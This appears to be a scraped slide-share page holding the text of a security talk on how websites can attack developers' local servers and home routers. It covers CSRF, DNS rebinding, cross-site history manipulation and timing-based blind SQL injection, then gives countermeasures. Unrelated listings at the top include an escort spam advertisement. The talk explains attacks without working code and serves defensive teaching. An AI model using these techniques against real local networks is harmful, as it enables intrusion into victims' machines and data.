Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 

Hacking Vulnerable Websites to Bypass Firewalls

  • 1. "Running vulnerable code in local networks" || "how to get pwned by any website" 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1 127.0.0.1
  • 2. The web is broken! Insecure standards, protocols and plugins ● WebRTC ● Leaks real IP behind VPN ● Can scan the local network ● SVG ● Not always blocked in picture uploads ● Leads to stored XSS, various filter bypasses, could be used to bypass CSP nonces ● Flash ● Unofficial competition between Flash and Firefox who gets most CVEs for code execution ● Exploit kit coder's choice
  • 3. SOP is too permissive ● Cross Site History Manipulation (XSHM) ● Load images and scripts from any domain ● Frame all the web sites ● But X-Frame-options?! ■ Still leaks page loading times ■ In some cases window.open() also does the job ● Does NOT prevent making requests ONLY prevents receiving responses ● Cookies are sent by default
  • 4. Are authenticated cross-origin requests necessary? ● Sending cookies when including remote images? ● Sending cookies when submitting forms to another website? ● Necessary? Sometimes. ● Should it be the default behaviour? Please no! ● Sending cookies with GET requests? ● There's not really a way around it ● Would annoy users
  • 5. The Problem ● Users don't want to trade too much comfort for security ● It's up to developers to implement counter measures for those shortcomings ■ CSRF Tokens ■ Same-Site Cookies ■ Checks for Origin header (web sockets) ● Developers don't want to trade too much comfort for security ● SOP is the enemy ■ crossdomain.xml ■ postMessage ■ CORS ■ JSONP
  • 6. That's nothing new ● We know we should use strong passwords and 2FA ● We should implement every possible counter measure for permissive SOP and other browser "features" ● We should not run insecure code in production ● We need to update our software
  • 7. We all follow those guidelines Except when we don't well...
  • 8. Let me explain At what point do you consider your code as publicly accessible? ● While coding ● In your private repository ● In your testing environment ● In production ✔ ✔ X
  • 9. Wait what? ● My web server binds to 127.0.0.1! ● Other servers used for testing are behind a firewall! ● I am the only one who has access to my code! ● Windows Defender is up and running, so I don't even know why I watch this presentation!11
  • 10. You forget about your biggest attack surface To hack your local application attackers can use ● CSRF ● DNS rebinding ● XSHM and similar attacks ● Timing side channels
  • 11. Security guidelines Now tell me again, at every stage of your web app development: ● Use strong passwords / 2FA / authentication? ● Exploitable through DNS rebinding, XSHM, CSRF ● Protect against CSRF? ● Exploitable through - well - CSRF ■ Also XSHM ■ Doesn't matter for DNS rebinding anyway if it's unauthenticated / passwords are guessable ● Only run secure code? ● As hacker or security researcher? ■ Get another job. ● As a developer? ■ I have some small doubts here
  • 12. Hacking the dev? Why not the server? ● Developers are the more valuable target when ● They have a copy of production data or access to backups ● They have access to other internal systems ● Production server is secured ● Their private movie collection is big enough (Critical mass > 500 GB) ● There might be multiple sites the developer is responsible for ● The application is announced but not online yet (startups, new features in existing sites) ● There's a higher chance * to find buggy code in a development environment ● * Except if you develop the facebook messenger for android, chances should be equal then
  • 13. But I'm not a developer Good point. No testing environment, no vulnerable applications, right? ● Applications that run web apps on your computer ● Management interfaces ● websockets to exchange data between website and client ● Other devices in your network ● Your internet connected fidget spinner (or whatever monstrosity kickstarter creates next) ● NAS management interface ● One web interface almost every consumer has in the network ● Vulnerable home Router
  • 15. Well, this is bad "That was a lucky guess with the default password. And stuff like an SQL injection can't be abused just with CSRF while you are cross-domain." ● Completely right ● You can't read the response of a request ● You can't add data if it's a SELECT query ● OOB exfiltration is not possible without proper privileges ■ Conclusion: My data is safe! XXX WRONG ● Oh come on, this is starting to get annoying ● Just because it is annoying. If you assume anything regarding SOP it's most likely wrong ● What's the matter now? How can an attacker possibly abuse an SQL injection through the victim's browser even though there's SOP in place?
  • 16. We've talked about them before: iframes! Iframes can be used to extract data from an SQL injection ● Well, not only iframes, but also <img>, xhr and even the websocket API ● The problem? Leaking page loading times ● So what? ● SQL injection + delayed page loading time = ? ● Right. We can abuse blind SQL injections cross-domain! ● Seems like it's...
  • 18. Well, this is bad too But what are the alternatives? ● Running your code in a VM ● Separation, but not that practical ● Can still lead to compromise of host machine or other machines in the network ● Code can be modified ● Don't visit the internet while you code ● ● Your code might require an active internet connection
  • 19. Is there any way to be safe? DNS Rebinding ● Side Effect: ● New host header ■ Shared hosting not vulnerable (only the default host) ■ We can whitelist the original host header ● Is it preventable? ● Yes. Either on application or server level (preferred). ● If the host header doesn't match a whitelisted value -> 403. ● Works for apache, IIS, nginx
  • 20. Is there any way to be safe? CSRF ● Problem: ● There might be no authentication yet ■ Critical functions might be exposed for everyone ■ No CSRF protection added yet ● You audit vulnerable code without CSRF protection at all ● There is not an easy solution for this ● Using frameworks ● Starting with ■ CSRF protection ■ Authentication MEH
  • 21. Is there any way to be safe? (Experimental) Universal CSRF Protection in your environment? Conveniently possible for PHP apps ● First: Create a file with the following content:
  • 22. Is there any way to be safe? Halfway done ● Next: Add the file to the PHP.ini directive auto_prepend_file ● This will automatically include the file whenever any PHP file is parsed. This works in a similar fashion as PHP's require(). ● This means, whenever a web page is opened it will ● Load the PHP file ● Check if a cookie with the name "access" is set ■ If it's not, it will just throw an error, set the cookie and stop execution ■ If it is, the file does nothing and doesn't interfere with your code ● Since it's a same site cookie requests can only be made from the same domain
  • 23. Conclusion Don't rely on SOP doing the right thing ● Everything we talked about is preventable, countermeasures are just not always well known ● Developers and Security Researchers should keep in mind that their testing environments are publicly accessible to a certain degree ● Even the average user is at risk. Passwords for routers should be strong and unique like every other password ● SOP alone is not going to save you